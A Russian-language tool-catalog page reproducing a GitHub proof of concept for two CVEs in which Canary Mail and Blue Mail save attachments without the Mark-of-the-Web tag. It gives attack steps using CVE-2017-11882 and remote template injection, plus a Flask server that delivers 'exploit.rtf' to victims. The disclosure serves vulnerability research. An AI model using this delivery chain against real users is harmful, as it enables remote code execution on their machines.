Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/bbaboha/cve-2025-65318-and-cve-2025-65319
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийАнализ вредоносных программТестирование на ПроникновениеОбучение и Образование
GitHubbbaboha/cve-2025-65318-and-cve-2025-65319

CVE-2025-65318-and-CVE-2025-65319

Небезопасная обработка вложений при использовании Canary Mail или Blue Mail

Репозиторий
759 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC для CVE-2025-65318 и CVE-2025-65319

  • CVE-2025-65318 (BDU:2025-13740): При использовании функции взаимодействия с вложениями Canary Mail 5.1.40 и ниже сохраняет документы в файловую систему без тега Mark-of-the-Web, что позволяет злоумышленникам обходить встроенные механизмы защиты файлов как ОС Windows, так и стороннего программного обеспечения.
  • CVE-2025-65319 (BDU:2025-13739): При использовании функции взаимодействия с вложениями Blue Mail 1.140.103 и ниже сохраняет документы в файловую систему без тега Mark-of-the-Web, что позволяет злоумышленникам обходить встроенные механизмы защиты файлов как ОС Windows, так и стороннего программного обеспечения.

Обзор

Основная проблема не в том, что пользователи открывают вредоносные вложения, а в том, что приложения, такие как Canary Mail или Blue Mail, предоставляют удобную, но небезопасную функцию для их сохранения или открытия. Я считаю это уязвимостью безопасности, которая подвергает пользователей риску со стороны злоумышленников.

CWE-693 - Отказ механизма защиты

PoC

Для демонстрации небезопасного открытия вложений Office Word через диалоговое окно «Открыть с помощью» или «Сохранить как» была использована уязвимость CVE-2017-11882 в редакторе формул для Office Word 16 и ниже.

  1. Создайте вредоносный RTF-объект на хосте атакующего, который открывает калькулятор на хосте с помощью скрипта.
  2. Разверните сервер для отправки вредоносного RTF-документа с использованием Remote Template Injection.
from flask import Flask, send_file, request
import logging
from datetime import datetime

app = Flask(__name__)

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

@app.before_request
def log_request_info():
    logger.info(f'Request: {request.method} {request.url} from {request.remote_addr}')

@app.after_request
def log_response_info(response):
    logger.info(f'Response: Status {response.status_code} for {request.url}')
    return response

@app.route('/download')
def download_file():
    try:
        response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
        logger.info('File download successful')
        return response
    except FileNotFoundError:
        logger.error('File exploit.rtf not found')
        return 'File not found', 404

if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0', port=5000)

  1. Создайте произвольный DOCX-документ и используйте удаленную инъекцию шаблона, запустив, например, PowerShell скрипт.
  2. Атакующий отправляет полученный вредоносный DOCX-документ жертве.
  3. Жертва открывает вредоносный документ с помощью функций «Открыть с помощью» или «Сохранить как» в Canary Mail/Blue Mail.
  4. При открытии вредоносного документа жертва может быть скомпрометирована без нажатия каких-либо дополнительных кнопок.

Воздействие

Потенциальное RCE для пользователей, использующих устаревшие версии Microsoft Office Word 16 и ниже

Затронутые версии

  • Canary Mail 5.1.40 и ниже
  • Blue Mail 1.140.103 и ниже

Видео PoC

CVE-2025-65318

https://github.com/user-attachments/assets/fc99d603-f56f-451b-a9f2-821422feef61

CVE-2025-65319

https://github.com/user-attachments/assets/68b638b9-e906-4c78-baae-84a369f807f3

Ссылки

  • https://bdu.fstec.ru/vul/2025-13739
  • https://bdu.fstec.ru/vul/2025-13740

Отказ от ответственности

Этот репозиторий предназначен только для образовательных исследований и исследований в области защиты.

Скачать инструмент